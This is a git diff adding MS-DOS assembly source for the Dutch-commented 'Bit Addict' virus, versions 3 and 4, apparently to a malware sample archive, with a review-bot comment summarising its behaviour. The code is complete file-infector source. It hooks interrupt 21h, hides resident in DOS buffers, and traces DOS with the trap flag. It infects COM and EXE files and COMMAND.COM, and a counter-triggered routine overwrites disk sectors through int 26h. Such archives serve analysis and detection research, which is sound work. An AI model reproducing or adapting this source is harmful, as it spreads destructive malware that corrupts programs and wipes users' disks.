+ mov cx,VirusSize-CodeSize
+ mov di,CodeSize
+ cld
+ rep stosb
+ call DebugOn
+ mov ah,52h ; lees het adres van de eerste
+ call DOS ; disk-buffer
+ push bx
+ mov ah,30h
+ call DOS
+ pop di
+ call DebugOff
+ cmp al,2 ; dit werkt niet op dos 1.x
+ jb @@12
+ cmp al,3 ; voor dos 2.x op di+13h en
+ adc di,12h ; voor dos 3+ op di+12h
+ lds si,es:[di]
+ or si,si
+ jne @@12
+ push di
+ cld
+ movsw ; reserveer 1e buffer
+ movsw
+ pop di
+ mov cx,ds
+ mov dx,ds
+ mov bx,3
+@@10: call GetBuffer ; reserveer 2e,3e en 4e
+ jc @@11 ; buffer
+ dec bx
+ jne @@10
+ call CopyBitAddict ; Copieer bit addict naar
+ pop es ; de buffers
+ push es ; Infecteer bestand in de
+ call InfectComspec ; comspec
+ jmp short @@12
+@@11: call RestoreBuffers
+@@12: pop es ; ga nu verder met het
+ pop ds ; programma voor Bit Addict
+ pop di
+ pop si
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+ cli
+ mov ss,cs:OldSS
+ mov sp,cs:OldSP
+ sti
+ jmp cs:OldCSIP
+
+GetBuffer: ; reserveer een buffer
+ push di ; cx = eerste buffer
+ push es ; dx = laatste buffer
+ jmp short @@21
+@@20: push ds
+ pop es
+ mov di,si
+@@21: lds si,es:[di]
+ or si,si
+ jne @@23
+ mov ax,ds
+ sub ax,dx
+ cmp ax,21h
+ jne @@22
+ mov dx,ds
+ cld
+ movsw
+ movsw
+ clc
+ jmp short @@24
+@@22: mov ax,ds
+ sub ax,cx
+ neg ax
+ cmp ax,21h
+ jne @@20
+ mov cx,ds
+ cld
+ movsw
+ movsw
+ clc
+ jmp short @@24
+@@23: stc
+@@24: pop es
+ pop di
+ ret
+
+CopyBitAddict:
+ push cs ; copieer Bit Addict naar de
+ pop ds ; gereserveerde buffers
+ mov es,cx
+ xor si,si
+ xor di,di
+ mov cx,VirusSize
+ cld
+ rep movsb
+ xor ax,ax ; leid interrupt 21h om naar
+ mov ds,ax ; Bit Addict
+ mov word ptr ds:[84h],offset NewInt21
+ mov word ptr ds:[86h],es
+ ret
+
+InfectComspec:
+ mov es,es:[2ch] ; lees environment segment
+ xor di,di
+ push cs ; zoek naar de comspec
+ pop ds ; variabele
+ mov si,offset Comspec
+@@30: push si
+ push di
+ mov cx,8
+ cld
+ repe cmpsb
+ pop di
+ pop si
+ je @@31
+ xor al,al
+ mov cx,-1
+ cld
+ repne scasb
+ cmp byte ptr es:[di],0
+ jne @@30
+ jmp short @@32
+@@31: push es ; infecteer de COMMAND.COM of
+ pop ds ; andere command interpreter
+ lea dx,[di+8]
+ push cs:OldIP
+ push cs:OldCS
+ push cs:OldSP
+ push cs:OldSS
+ call Infect
+ pop cs:OldSS
+ pop cs:OldSP
+ pop cs:OldCS
+ pop cs:OldIP
+@@32: ret
+
+RestoreBuffers:
+ mov ax,cx
+@@40: cmp ax,dx
+ je @@42
+ mov ds,ax
+ add ax,21h
+ mov word ptr ds:[0],0
+ mov word ptr ds:[2],ax
+ jmp short @@40
+@@42: mov ds,dx
+ mov ax,es:[di]
+ mov ds:[0],ax
+ mov word ptr es:[di],0
+ mov ax,es:[di+2]
+ mov ds:[2],ax
+ mov es:[di+2],cx
+ ret
+
+DebugOn:push ax
+ push ds
+ xor ax,ax
+ mov ds,ax
+ cli
+ mov ax,ds:[4h]
+ mov word ptr cs:OldInt1[0],ax
+ mov ax,ds:[6h]
+ mov word ptr cs:OldInt1[2],ax
+ mov word ptr ds:[4],offset NewInt1
+ mov word ptr ds:[6],cs
+ mov ax,ds:[84h]
+ mov word ptr cs:OldInt21[0],ax
+ mov ax,ds:[86h]
+ mov word ptr cs:OldInt21[2],ax
+ mov word ptr cs:DosInt21[0],0
+ mov word ptr cs:DosInt21[2],0
+ sti
+ pop ds
+ pop ax
+ pushf
+ push cs
+ call SetTrap
+ ret
+
+SetTrap:push bp
+ mov bp,sp
+ or word ptr ss:[bp+6],100h
+ pop bp
+ iret
+
+DebugOff:
+ pushf
+ push cs
+ call ClearTrap
+ push ax
+ push ds
+ xor ax,ax
+ mov ds,ax
+ cli
+ mov ax,word ptr cs:OldInt1[0]
+ mov ds:[4],ax
+ mov ax,word ptr cs:OldInt1[2]
+ mov ds:[6],ax
+ sti
+ pop ds
+ pop ax
+ ret
+
+ClearTrap:
+ push bp
+ mov bp,sp
+ and word ptr ss:[bp+6],0feffh
+ pop bp
+ iret
+
+Init: push cs
+ pop ds
+ cmp OldSignature,5a4dh
+ je @@50
+ mov si,offset SavedCode ; herstel begin van het
+ mov di,100h ; com-programma
+ mov cx,10h
+ cld
+ rep movsb
+ mov OldSS,ss ; bewaar de waarden van
+ mov OldSP,sp ; ss,sp,cs en ip
+ sub OldSP,10h
+ mov OldCS,es
+ mov OldIP,100h
+ jmp short @@51
+@@50: mov ax,es ; bereken de waarden van
+ add ax,10h ; ss,sp,cs en ip
+ add OldCS,ax
+ add OldSS,ax
+@@51: mov ax,4b40h ; controleer of Bit Addict al
+ int 21h ; in het geheugen aanwezig is
+ jc @@52
+ mov ds,ax
+ push cs ; vergelijk identificatie
+ pop ds
+ mov si,offset ID
+ mov di,si
+ mov cx,ID_Length
+ cld
+ repe cmpsb
+ je @@52
+ stc
+@@52: ret
+
+BiosCheck:
+ mov ax,0f000h
+ mov ds,ax
+ push cs
+ pop es
+ xor si,si
+ mov di,offset Bios
+ mov cx,10h
+ cld
+ repe cmpsb
+ je @@54
+ mov ax,cs:Count
+ inc ax
+ cmp ax,100h
+ jb @@53
+ call BitAddict
+@@53: mov cs:Count,ax
+ xor si,si
+ mov di,offset Bios
+ mov cx,10h
+ rep movsb
+@@54: ret
+
+BitAddict:
+ xor dx,dx
+@@55: push dx
+ mov ax,3
+ xor bx,bx
+ mov cx,40h
+ int 26h
+ pop ax
+ pop dx
+ add dx,40h
+ or dx,dx
+ jne @@55
+ ret
+
+NewInt1:push bp
+ mov bp,sp
+ push ax
+ mov ax,word ptr cs:DosInt21[0]
+ or ax,word ptr cs:DosInt21[2]
+ jnz @@60
+ cmp word ptr ss:[bp+4],300h
+ jae @@61
+ mov ax,ss:[bp+2]
+ mov word ptr cs:DosInt21[0],ax
+ mov ax,ss:[bp+4]
+ mov word ptr cs:DosInt21[2],ax
+@@60: and word ptr ss:[bp+6],0feffh
+@@61: pop ax
+ pop bp
+ iret
+
+DOS: push ax
+ mov ax,word ptr cs:DosInt21[0]
+ or ax,word ptr cs:DosInt21[2]
+ pop ax
+ jnz @@62
+ pushf
+ call cs:OldInt21
+ ret
+@@62: pushf
+ call cs:DosInt21
+ ret
+
+InstallCheck: ; Zo kan bit addict weten
+ mov ax,cs ; dat er al een andere copy
+ popf ; aanwezig is
+ clc
+ retf 2
+
+Exec: call CheckExtension ; functie 4bh, infecteer eerst
+ jc EOI ; met Bit Addict
+ mov byte ptr cs:Active,1
+ call Infect
+ mov byte ptr cs:Active,0
+ jmp short EOI
+
+NewInt21: ; Het nieuwe interrupt 21h
+ pushf
+ cmp byte ptr cs:Active,0
+ jne EOI
+ cmp ah,3dh
+ je Open
+ cmp ah,3ch
+ je Open
+ cmp ah,3eh
+ je Close
+ cmp ax,4b40h
+ je InstallCheck
+ cmp ah,4bh
+ je Exec
+EOI: popf
+ jmp cs:OldInt21
+
+Open: call CheckExtension
+ jc EOI
+ mov byte ptr cs:Active,1
+ call cs:OldInt21
+ jc @@92
+ pushf
+ push ax
+ push cx
+ push si
+ push di
+ push es
+ push cs
+ pop es
+ mov si,dx
+ mov di,offset File1
+ cmp word ptr es:[di],0
+ je @@90
+ mov di,offset File2
+ cmp word ptr es:[di],0
+ jne @@91
+@@90: cld
+ stosw
+ mov cx,70
+ rep movsb
+@@91: pop es
+ pop di
+ pop si
+ pop cx
+ pop ax
+ popf
+@@92: mov byte ptr cs:Active,0
+ retf 2
+
+Close: cmp bx,cs:File1
+ je @@93
+ cmp bx,cs:File2
+ jne EOI
+ mov byte ptr cs:Active,1
+ call cs:OldInt21
+ push si
+ mov si,offset File2
+ jmp short @@94
+@@93: mov byte ptr cs:Active,1
+ call cs:OldInt21
+ push si
+ mov si,offset File1
+@@94: jc @@95
+ pushf
+ push dx
+ push ds
+ push cs
+ pop ds
+ lea dx,[si+2]
+ call Infect
+ pop ds
+ pop dx
+ popf
+@@95: mov word ptr cs:[si],0
+ mov byte ptr cs:Active,0
+ pop si
+ retf 2
+
+CheckExtension:
+ push ax
+ push cx
+ push si
+ push di
+ push es
+ push ds
+ pop es
+ mov di,dx
+ xor al,al
+ mov cx,70
+ cld
+ repne scasb
+ jne @@65
+ std
+ mov al,'.'
+ neg cx
+ add cx,70
+ std
+ repne scasb
+ jne @@65
+ lea si,[di+2]
+ cld
+ lodsw
+ and ax,0dfdfh
+ cmp ax,5845h ; 'EX'
+ je @@64
+ cmp ax,4f43h ; 'CO'
+ jne @@65
+ lodsb
+ and al,0dfh
+ cmp al,4dh ; 'M'
+ je @@66
+ jmp short @@65
+@@64: lodsb
+ and al,0dfh
+ cmp al,45h ; 'E'
+ je @@66
+@@65: stc
+ jmp short @@67
+@@66: clc
+@@67: pop es
+ pop di
+ pop si
+ pop cx
+ pop ax
+ ret
+
+ComHeader: ; dit stukje wordt voor een
+ mov ax,cs ; COM-file geplaatst
+ add ax,0100h
+OldSize equ this word-2
+ push ax
+ mov ax,offset Begin
+ push ax
+ retf
+
+Infect: push ax ; Infecteer een file
+ push bx
+ push cx
+ push si
+ push di
+ push bp
+ push es
+ mov ax,4300h ; lees attributen en bewaar
+ call DOS ; ze
+ jmpc @@83
+ push cx
+ push dx
+ push ds
+ test cx,1
+ jz @@71
+ mov ax,4301h ; set Read-Only attribuut
+ and cx,0fffeh ; op nul
+ call DOS
+ jmpc @@82
+@@71: mov ax,3d02h ; open de file
+ call DOS
+ jmpc @@82
+ mov bx,ax
+ mov ax,5700h ; lees de datum en tijd en
+ call DOS ; bewaar ze
+ jmpc @@81
+ push cx
+ push dx
+ push cs ; ds=es=cs
+ pop ds
+ push cs
+ pop es
+ mov ah,3fh ; lees de header van de file
+ mov cx,HeaderLength
+ mov dx,offset Header
+ call DOS
+ jmpc @@80
+ cmp ax,HeaderLength
+ jne @@75
+ cmp Signature,5a4dh
+ jne @@72
+ mov ax,ExeCS ; zoek de plaats waar de
+ add ax,HeaderSize ; identificatie zou moeten
+ mov dx,10h ; staan voor exe-files
+ mul dx
+ add ax,offset ID
+ adc dx,0
+ jmp short @@73
+@@72: mov ax,ComCS ; doe hetzelfde maar dan voor
+ mov dx,10h ; een com-file
+ sub ax,dx
+ mul dx
+ add ax,offset ID
+ adc dx,0
+@@73: mov cx,dx
+ mov dx,ax
+ mov ax,4200h
+ call DOS
+ jc @@74
+ mov ah,3fh ; lees de ID indien aanwezig
+ mov cx,ID_Length
+ mov dx,offset ID_Check
+ call DOS
+ jc @@74
+ cmp ax,ID_Length
+ jne @@74
+ mov si,offset ID_Check ; controleer of ID aanwezig
+ mov di,offset ID ; is
+ mov cx,ID_Length
+ cld
+ repe cmpsb
+ jmpe @@80 ; als ID aanwezig is, stop dan
+@@74: cmp Signature,5a4dh
+ je @@77
+@@75: mov ax,4202h ; infecteer com-files
+ xor cx,cx ; ga naar het einde van de file
+ xor dx,dx
+ call DOS
+ mov cx,10h ; aanpassen van de com-header
+ div cx ; aan deze com-file
+ or dx,dx
+ je @@76
+ push ax
+ mov ah,40h
+ mov cx,10h
+ sub cx,dx
+ xor dx,dx
+ call DOS
+ pop ax
+ jmpc @@80
+ inc ax
+@@76: add ax,10h
+ mov OldSize,ax
+ mov si,offset Header ; bewaar het eerste deel van
+ mov di,offset SavedCode ; het programma
+ mov cx,10h
+ cld
+ rep movsb
+ mov ah,40h ; schrijf het virus achter het
+ mov cx,CodeSize ; programma
+ xor dx,dx
+ call DOS
+ jmpc @@80
+ mov ax,4200h ; ga naar het begin van de file
+ xor cx,cx
+ xor dx,dx
+ call DOS
+ jmpc @@80
+ mov ah,40h ; overschrijf het begin van het
+ mov cx,10h ; programma met de com-header
+ mov dx,offset ComHeader
+ call DOS
+ jmp @@80
+@@77: mov OldSignature,5a4dh ; infecteer exe-files
+ mov ax,ExeIP ; bewaar de oude waarden van
+ mov OldIP,ax ; cs:ip en ss:sp
+ mov ax,ExeCS
+ mov OldCS,ax
+ mov ax,ExeSP
+ mov OldSP,ax
+ mov ax,ExeSS
+ mov OldSS,ax
+ mov ax,PageCount ; pas de waarden van cs:ip en
+ dec ax ; ss:sp aan, en pas ook de
+ mov cx,200h ; lengte van de file aan
+ mul cx
+ add ax,PartPage
+ adc dx,0
+ mov cx,dx
+ mov dx,ax
+ mov ax,4200h
+ call DOS
+ jmpc @@80
+ push ax
+ push dx
+ mov ah,3fh
+ mov cx,80h
+ mov dx,offset Buffer
+ int 21h
+ mov cx,ax
+ pop dx
+ pop ax
+ jmpc @@80
+ cmp cx,80h
+ jmpe @@80
+ add ax,cx
+ adc dx,0
+ mov cx,10h
+ div cx
+ or dx,dx
+ je @@78
+ push ax
+ push dx
+ mov ah,40h
+ mov cx,10h
+ sub cx,dx
+ xor dx,dx
+ call DOS
+ pop dx
+ pop ax
+ jc @@80
+ inc ax
+@@78: sub ax,HeaderSize
+ mov ExeCS,ax
+ mov ExeIP,offset Begin
+ add ax,VirusSizePara
+ mov ExeSS,ax
+ mov ExeSP,200h
+ mov ax,MinMem
+ cmp ax,20h+VirusSizePara-CodeSizePara
+ jae @@79
+ mov ax,20h
+@@79: mov MinMem,ax
+ mov ax,PartPage
+ add ax,CodeSize
+ add ax,dx
+ mov cx,200h
+ xor dx,dx
+ div cx
+ add PageCount,ax
+ mov PartPage,dx
+ mov ah,40h ; schrijf het virus achter
+ mov cx,CodeSize ; de exe-file, indien de
+ xor dx,dx ; exe-file overlays bevat dan
+ call DOS ; worden ze overschreven en is
+ jc @@80 ; de exe-file onherstelbaar
+ mov ax,4200h ; beschadigd
+ xor cx,cx
+ xor dx,dx ; ga naar het begin van de file
+ call DOS
+ jc @@80
+ mov ah,40h ; schrijf de nieuwe exe-header
+ mov cx,HeaderLength ; over de oude heen.
+ mov dx,offset Header
+ call DOS
+@@80: pop dx ; herstel de datum van de file
+ pop cx
+ mov ax,5701h
+ call DOS
+@@81: mov ah,3eh ; sluit de file
+ call DOS
+@@82: pop ds ; herstel de attributen van de
+ pop dx ; file
+ pop cx
+ test cx,1
+ jz @@83
+ mov ax,4301h
+ call DOS
+@@83: pop es ; herstel de waarden van de
+ pop bp ; registers en keer terug
+ pop di ; naar het oude interrupt 21
+ pop si
+ pop cx
+ pop bx
+ pop ax
+ ret
+
+CodeEnd equ $
+
+Header dw HeaderLength/2 dup(?)
+ComCS equ Header[OldSize-Comheader] ; Com file
+
+Signature equ Header[0h] ; Exe file
+PartPage equ Header[2h]
+PageCount equ Header[4h]
+HeaderSize equ Header[8h]
+MinMem equ Header[0ah]
+MaxMem equ Header[0ch]
+ExeSS equ Header[0eh]
+ExeSP equ Header[10h]
+ExeIP equ Header[14h]
+ExeCS equ Header[16h]
+
+ID_Check db ID_Length dup(?)
+
+Active db ?
+
+DosInt21 dd ?
+OldInt21 dd ?
+OldInt1 dd ?
+
+File1 dw 36 dup(?)
+File2 dw 36 dup(?)
+
+Buffer db 80h dup(?)
+
+VirusEnd equ $
+
+cseg ends
+
+sseg segment stack
+ db 200h dup(?)
+sseg ends
+
+end Begin
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.addict8.asm b/MSDOS/Virus.MSDOS.Unknown.addict8.asm
new file mode 100644
index 00000000..fa286b2a
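Review bot: The addict7 file has no English header saying what the sample is or what it observably does, and every comment is in Dutch, so an analyst triaging this hunk must reconstruct the behaviour from the code; the addict8 hunk has the same gap. I would add a header comment above `; Bit Addict Versie 3` listing the points a detection engineer needs: `CopyBitAddict` patches the interrupt 21h vector in place at 0000:0084h, `DebugOn` installs an interrupt 1 handler and sets the trap flag to locate the DOS entry point, `BitAddict` issues `int 26h` absolute sector writes with `al` = 3 once the incremented `Count` reaches 100h, and `Infect` appends the code to COM and EXE files seen on open/create, close and exec calls after clearing their read-only attribute. In addict8 the comment on that `int 26h` loop says the C drive is overwritten while `al` is loaded with 3; if `int 26h` numbers drives from 0 that is not the C drive, so the header should state the register value rather than repeat the comment's claim.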
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.addict8.asm
@@ -0,0 +1,793 @@
+; Bit Addict Versie 4
+
+;-----------------------------------------------------------------------------
+;----- -----
+;----- Macros en andere hulpmiddellen -----
+;----- -----
+;-----------------------------------------------------------------------------
+
+; de macro's hieronder worden gebruikt wanneer een conditionele sprong groter
+; wordt dan 128 bytes en er dus een foutmelding komt
+
+dfn macro Num1,Num2
+ db Num1
+ dw offset Num2
+ endm
+
+jmpc macro Dest ; vervanging voor jc
+ local @@00
+
+ jnc @@00
+ jmp Dest
+@@00:
+ endm
+
+jmpnc macro Dest ; vervanging voor jnc
+ local @@00
+
+ jc @@00
+ jmp Dest
+@@00:
+ endm
+
+jmpe macro Dest ; vervanging voor je
+ local @@00
+
+ jnz @@00
+ jmp Dest
+@@00:
+ endm
+
+jmpne macro Dest ; vervanging voor jne
+ local @@00
+
+ jz @@00
+ jmp Dest
+@@00:
+ endm
+
+eseg segment
+ mov ax,4c00h ; exit
+ int 21h
+eseg ends
+
+;-----------------------------------------------------------------------------
+;----- -----
+;----- Begin van het Bit Addict virus -----
+;----- -----
+;-----------------------------------------------------------------------------
+
+cseg segment
+ assume cs:cseg,ds:cseg,es:cseg
+ org 0
+
+BeginCode equ $ ; begin van het virus
+
+CodeSize equ CodeEnd-BeginCode ; de grootte van het
+CodeSizePara equ (CodeEnd-BeginCode+0fh) / 10h ; virus achter een file
+
+VirusSize equ VirusEnd-BeginCode ; de grootte van het
+VirusSizePara equ (VirusEnd-BeginCode+0fh) / 10h ; virus in het geheugen
+
+HeaderLength equ 18h ; grootte van een
+
+SavedCode equ this byte ; gegevens over het
+OldSignature dw 5a4dh ; programma voor het
+OldCSIP equ this dword ; virus
+OldIP dw 0
+OldCS dw 0
+OldSP dw 200h
+OldSS dw 0
+OldPartPage dw 0
+OldPageCount dw 0
+
+Begin: push ax ; Programma om het virus
+ push ds ; resident te laten blijven
+ push es ; en om de comspec te
+ call Init ; infecteren
+ jnc @@12
+ call BiosCheck ; Als bit addict op een andere
+ push cs ; computer draait wordt er een
+ pop es ; teller verhoogt.
+ xor al,al
+ mov cx,VirusSize-CodeSize ; zet alle variabelen op nul
+ mov di,CodeSize
+ cld
+ rep stosb ; debug interrupt 21h om het
+ call DebugOn ; orginele interrupt te vinden
+ mov ah,52h
+ call DOS ; lees het adres van de eerste
+ push bx ; disk-buffer
+ mov ah,30h
+ call DOS
+ pop di
+ call DebugOff
+ cmp al,2 ; dit werkt niet op dos 1.x
+ jb @@12
+ cmp al,3 ; voor dos 2.x op di+13h en
+ adc di,12h ; voor dos 3+ op di+12h
+ lds si,es:[di]
+ or si,si
+ jne @@12
+ push di
+ cld
+ movsw ; reserveer 1e buffer
+ movsw
+ pop di
+ mov cx,ds
+ mov dx,ds
+ mov bx,3
+@@10: call GetBuffer ; reserveer 2e,3e en 4e
+ jc @@11 ; buffer
+ dec bx
+ jne @@10
+ call CopyBitAddict ; Copieer bit addict naar
+ pop es ; de buffers
+ push es ; Infecteer bestand in de
+ call InfectComspec ; comspec
+ jmp short @@12
+@@11: call RestoreBuffers ; voor als het fout gaat
+@@12: pop es
+ pop ds ; ga nu verder met het
+ pop ax ; programma voor Bit Addict
+ cli
+ mov ss,cs:OldSS
+ mov sp,cs:OldSP
+ sti
+ jmp cs:OldCSIP
+
+
+Comspec db 'COMSPEC=' ; comspec environment variabele
+ ; om de command.com te vinden
+
+ID dw 0DEADh ; hier wordt het virus herkend
+ ; als het in het geheugen staat
+
+Count dw 0 ; In deze variabele staat op
+ ; hoeveel verschillende
+ ; computers het virus is
+ ; geweest
+Bios db 10h dup(0) ; Gegevens over de bios,
+ ; door dit te vergelijken met
+ ; de bios kan het virus weten
+ ; of het virus op een andere
+ ; computer draait
+
+GetBuffer: ; reserveer een buffer
+ push di ; cx = eerste buffer
+ push es ; dx = laatste buffer
+ jmp short @@21
+@@20: push ds ; zoek een buffer die naast een
+ pop es ; gereserveerde buffer ligt, dus
+ mov di,si ; 21h voor cx, of 21h na dx.
+@@21: lds si,es:[di]
+ or si,si
+ jne @@23
+ mov ax,ds
+ sub ax,dx
+ cmp ax,21h
+ jne @@22
+ mov dx,ds
+ cld
+ movsw
+ movsw
+ clc
+ jmp short @@24
+@@22: mov ax,ds
+ sub ax,cx
+ cmp ax,-21h
+ jne @@20
+ mov cx,ds
+ cld
+ movsw
+ movsw
+ clc
+ jmp short @@24
+@@23: stc
+@@24: pop es
+ pop di
+ ret
+
+CopyBitAddict:
+ push cs ; copieer Bit Addict naar de
+ pop ds ; gereserveerde buffers
+ mov es,cx
+ xor si,si
+ xor di,di
+ mov cx,VirusSize
+ cld
+ rep movsb
+ xor ax,ax ; leid interrupt 21h om naar
+ mov ds,ax ; Bit Addict
+ mov word ptr ds:[84h],offset NewInt21
+ mov word ptr ds:[86h],es
+ ret
+
+InfectComspec:
+ mov es,es:[2ch] ; lees environment segment
+ xor di,di
+ push cs ; zoek naar de comspec
+ pop ds ; variabele
+ mov si,offset Comspec
+@@30: push si
+ push di
+ mov cx,8
+ cld
+ repe cmpsb
+ pop di
+ pop si
+ je @@31
+ xor al,al
+ mov cx,-1
+ cld
+ repne scasb
+ cmp byte ptr es:[di],0 ; is dit de laatste variabele ?
+ jne @@30
+ jmp short @@33
+@@31: push es ; infecteer de COMMAND.COM of
+ pop ds ; andere command interpreter,
+ cmp byte ptr ds:[di+9],':' ; maar doe dit alleen wanneer
+ jne @@32 ; de comspec naar de c of de
+ mov al,ds:[di+8] ; d-drive wijst.
+ and al,0dfh
+ cmp al,'C'
+ je @@32
+ cmp al,'D'
+ jne @@33
+@@32: lea dx,[di+8]
+ push cs:OldIP ; bewaar alle variabelen die
+ push cs:OldCS ; we nog nodig hebben.
+ push cs:OldSP
+ push cs:OldSS
+ call Infect ; infecteren
+ pop cs:OldSS ; herstel alle variabelen die
+ pop cs:OldSP ; we nog nodig hebben
+ pop cs:OldCS
+ pop cs:OldIP
+@@33: ret
+
+RestoreBuffers: ; wanneer er niet genoeg
+ mov ax,cx ; buffers zijn, zet dan de
+@@40: cmp ax,dx ; buffers weer terug in de
+ je @@42 ; keten, anders zal het
+ mov ds,ax ; systeem hangen.
+ add ax,21h
+ mov word ptr ds:[0],0
+ mov word ptr ds:[2],ax
+ jmp short @@40
+@@42: mov ds,dx
+ mov ax,es:[di]
+ mov ds:[0],ax
+ mov word ptr es:[di],0
+ mov ax,es:[di+2]
+ mov ds:[2],ax
+ mov es:[di+2],cx
+ ret
+
+DebugOn:push ax ; deze procedere is om de
+ push ds ; trap-flag te zetten, en
+ xor ax,ax ; interrupt 1 te initialiseren
+ mov ds,ax
+ cli
+ mov ax,ds:[4h]
+ mov word ptr cs:OldInt1[0],ax
+ mov ax,ds:[6h]
+ mov word ptr cs:OldInt1[2],ax
+ mov word ptr ds:[4],offset NewInt1
+ mov word ptr ds:[6],cs
+ mov ax,ds:[84h]
+ mov word ptr cs:OldInt21[0],ax
+ mov ax,ds:[86h]
+ mov word ptr cs:OldInt21[2],ax
+ mov word ptr cs:DosInt21[0],0
+ mov word ptr cs:DosInt21[2],0
+ pushf
+ pop ax
+ or ah,1
+ push ax
+ popf
+ sti
+ pop ds
+ pop ax
+ ret
+
+DebugOff: ; deze procedure zet de
+ push ax ; trap-flag weer op nul en
+ push ds ; herstelt interrupt 1.
+ cli
+ pushf
+ pop ax
+ and ah,0feh
+ push ax
+ popf
+ xor ax,ax
+ mov ds,ax
+ mov ax,word ptr cs:OldInt1[0]
+ mov ds:[4],ax
+ mov ax,word ptr cs:OldInt1[2]
+ mov ds:[6],ax
+ sti
+ pop ds
+ pop ax
+ ret
+
+Init: push cs
+ pop ds
+ cmp OldSignature,5a4dh
+ je @@50
+ mov si,offset SavedCode ; herstel begin van het
+ mov di,100h ; com-programma
+ mov cx,Dead-ComHeader+2
+ cld
+ rep movsb
+ mov OldSS,ss ; bewaar de waarden van
+ mov OldSP,sp ; ss,sp,cs en ip
+ sub OldSP,10h
+ mov OldCS,es
+ mov OldIP,100h
+ jmp short @@51
+@@50: mov ax,es ; bereken de waarden van
+ add ax,10h ; ss,sp,cs en ip
+ add OldCS,ax
+ add OldSS,ax
+@@51: mov ax,4b40h ; controleer of Bit Addict al
+ int 21h ; in het geheugen aanwezig is
+ jc @@52
+ mov ds,ax
+ mov ax,word ptr ds:ID ; vergelijk identificatie
+ cmp ax,word ptr cs:ID
+ je @@52
+ stc
+@@52: ret
+
+BiosCheck: ; deze procedure vergelijkt
+ mov ax,0ffffh ; de bios, met de gegevens
+ mov ds,ax ; over de bios in het virus,
+ push cs ; zijn deze niet gelijk, dan
+ pop es ; zal het virus op een andere
+ xor si,si ; computer draaien, en wordt
+ mov di,offset Bios ; er een teller verhoogt, komt
+ mov cx,10h ; deze teller boven de 255 dan
+ cld ; zal het bit-addict virus
+ repe cmpsb ; actief worden.
+ je @@54
+ mov ax,cs:Count
+ inc ax
+ cmp ax,100h
+ jb @@53
+ call BitAddict
+@@53: mov cs:Count,ax
+ xor si,si
+ mov di,offset Bios
+ mov cx,10h
+ rep movsb
+@@54: ret
+
+BitAddict: ; in deze procedure wordt
+ xor dx,dx ; de c-drive overscreven met
+@@55: push dx ; onzin, dit mag verandert
+ mov ax,3 ; worden, om het virus iets
+ xor bx,bx ; anders te laten doen, een
+ mov cx,40h ; muziekje spelen, of met het
+ int 26h ; toetsenbord spelen
+ pop ax ; bijvoorbeeld.
+ pop dx
+ add dx,40h
+ or dx,dx
+ jne @@55
+ ret
+
+NewInt1:push bp ; deze procedure wordt
+ mov bp,sp ; gebruikt bij het debuggen
+ push ax
+ mov ax,word ptr cs:DosInt21[0]
+ or ax,word ptr cs:DosInt21[2]
+ jnz @@60
+ cmp word ptr ss:[bp+4],300h
+ jae @@61
+ mov ax,ss:[bp+2]
+ mov word ptr cs:DosInt21[0],ax
+ mov ax,ss:[bp+4]
+ mov word ptr cs:DosInt21[2],ax
+@@60: and word ptr ss:[bp+6],0feffh
+@@61: pop ax
+ pop bp
+ iret
+
+DOS: push ax ; roept interrupt 21h aan.
+ mov ax,word ptr cs:DosInt21[0]
+ or ax,word ptr cs:DosInt21[2]
+ pop ax
+ jnz @@62
+ pushf
+ call cs:OldInt21
+ ret
+@@62: pushf
+ call cs:DosInt21
+ ret
+
+Functions: ; dit is een tabel met alle
+ dfn 3ch,Open ; dos-functies die door
+ dfn 3dh,Open ; bit-addict verandert worden
+ dfn 3eh,Close
+ dfn 3fh,Read
+ dfn 40h,Write
+ dfn 4bh,Exec
+
+NewInt21: ; Het nieuwe interrupt 21h
+ pushf
+ push bx
+ push bp
+ mov bp,sp
+ mov bx,offset Functions
+@@63: cmp ah,cs:[bx]
+ je @@68
+ add bx,3
+ cmp bx,offset NewInt21
+ jne @@63
+ pop bp
+ pop bx
+EOI: popf
+ jmp cs:OldInt21
+@@68: mov bx,cs:[bx+1]
+ xchg bx,ss:[bp+2]
+ pop bp
+ ret
+
+InstallCheck: ; Zo kan bit addict weten
+ mov ax,cs ; dat er al een andere copy
+ popf ; aanwezig is
+ clc
+ retf 2
+
+Exec: cmp al,40h
+ je InstallCheck
+ call CheckExtension ; functie 4bh, infecteer eerst
+ jc EOI ; met Bit Addict
+ popf
+ push dx
+ push ds
+ pushf
+ call cs:OldInt21
+ pop ds
+ pop dx
+ pushf
+ call Infect
+ popf
+ retf 2
+
+Open: call CheckExtension ; fn 3ch en 3dh
+ jc EOI
+ call cs:OldInt21
+ jc @@92
+ pushf
+ push ax
+ push cx
+ push si
+ push di
+ push es
+ push cs
+ pop es
+ mov si,dx
+ mov di,offset File1
+ cmp word ptr es:[di],0
+ je @@90
+ mov di,offset File2
+ cmp word ptr es:[di],0
+ jne @@91
+@@90: cld
+ stosw
+ mov cx,70
+ rep movsb
+@@91: pop es
+ pop di
+ pop si
+ pop cx
+ pop ax
+ popf
+@@92: retf 2
+
+Close: cmp bx,cs:File1 ; fn 3eh
+ je @@93
+ cmp bx,cs:File2
+ jne EOI
+ call cs:OldInt21
+ push si
+ mov si,offset File2
+ jmp short @@94
+@@93: call cs:OldInt21
+ push si
+ mov si,offset File1
+@@94: jc @@95
+ pushf
+ push dx
+ push ds
+ push cs
+ pop ds
+ lea dx,[si+2]
+ call Infect
+ pop ds
+ pop dx
+ popf
+@@95: mov word ptr cs:[si],0
+ pop si
+ retf 2
+
+Read: jmp EOI ; fn 3fh
+
+Write: jmp EOI ; fn 40h
+
+CheckExtension: ; controleer of de extensie
+ push ax ; wel exe of com is
+ push cx
+ push si
+ push di
+ push es
+ push ds
+ pop es
+ mov di,dx ; zoek het einde van de
+ xor al,al ; file-naam
+ mov cx,70
+ cld
+ repne scasb
+ jne @@65
+ std
+ mov al,'.' ; zoek de laatste punt
+ neg cx
+ add cx,70
+ std
+ repne scasb
+ jne @@65
+ lea si,[di+2]
+ cld
+ lodsw ; eerste 2 letters
+ and ax,0dfdfh ; maak hoofdletters
+ cmp ax,5845h ; 'EX'
+ je @@64
+ cmp ax,4f43h ; 'CO'
+ jne @@65
+ lodsb ; 3e letter
+ and al,0dfh
+ cmp al,4dh ; 'M'
+ je @@66
+ jmp short @@65
+@@64: lodsb ; 3e letter
+ and al,0dfh
+ cmp al,45h ; 'E'
+ je @@66
+@@65: stc
+ jmp short @@67
+@@66: clc
+@@67: pop es
+ pop di
+ pop si
+ pop cx
+ pop ax
+ ret
+
